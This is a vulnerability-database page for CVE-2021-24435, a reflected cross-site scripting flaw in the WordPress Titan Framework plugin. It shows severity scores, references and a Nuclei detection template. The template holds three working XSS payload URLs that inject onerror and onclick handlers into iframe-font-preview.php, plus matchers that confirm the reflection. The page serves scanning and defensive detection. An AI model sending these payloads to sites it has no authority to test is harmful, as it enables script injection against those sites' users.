ProjectDiscoveryNUCLEI:CVE-2021-24435WordPress Titan Framework plugin <= 1.12.1 - Cross-Site Scripting
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
0.001 Low
EPSS
Percentile
45.6%
The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues.
id: CVE-2021-24435
info:
name: WordPress Titan Framework plugin <= 1.12.1 - Cross-Site Scripting
author: xcapri,ritikchaddha
severity: medium
description: |
The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
remediation: Fixed in version 2.7.12
reference:
- https://wpscan.com/vulnerability/a88ffc42-6611-406e-8660-3af24c9cc5e8
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24435
- https://nvd.nist.gov/vuln/detail/CVE-2021-24435
- https://patchstack.com/database/vulnerability/titan-framework/wordpress-titan-framework-plugin-1-12-1-reflected-cross-site-scripting-xss-vulnerability
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-24435
cwe-id: CWE-79
epss-score: 0.0014
epss-percentile: 0.4866
cpe: cpe:2.3:a:gambit:titan_framework:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 3
vendor: gambit
product: titan_framework
framework: wordpress
tags: cve2021,cve,wp,xss,wp-plugin,titan-framework,wpscan,wordpress,gambit
http:
- method: GET
path:
- "{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=%27/onerror=%27alert(document.domain)%27/b=%27"
- "{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20onerror=alert(document.domain)%20b=%27"
- "{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20accesskey=%27x%27%20onclick=%27alert(document.domain)%27%20class=%27"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: header
words:
- "text/html"
- type: regex
regex:
- (?i)(onerror=|onclick=)['"]?alert\(document\.domain\)['"]?
- '<p>Grumpy wizards make'
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100b274a3153b4cde29ead1240a44502cbd6ca417a12104f68f3e81fc354ff0091b022100fa5610d0c8faa4d8504b66848c83c4d689be8c8c917cac6db669e55696f38ecc:922c64590222798bb761d5b6d8e72950References
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24435
github.com/ARPSyndicate/cvemon
nvd.nist.gov/vuln/detail/CVE-2021-24435
patchstack.com/database/vulnerability/titan-framework/wordpress-titan-framework-plugin-1-12-1-reflected-cross-site-scripting-xss-vulnerability
wpscan.com/vulnerability/a88ffc42-6611-406e-8660-3af24c9cc5e8
Related
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
0.001 Low
EPSS
Percentile
45.6%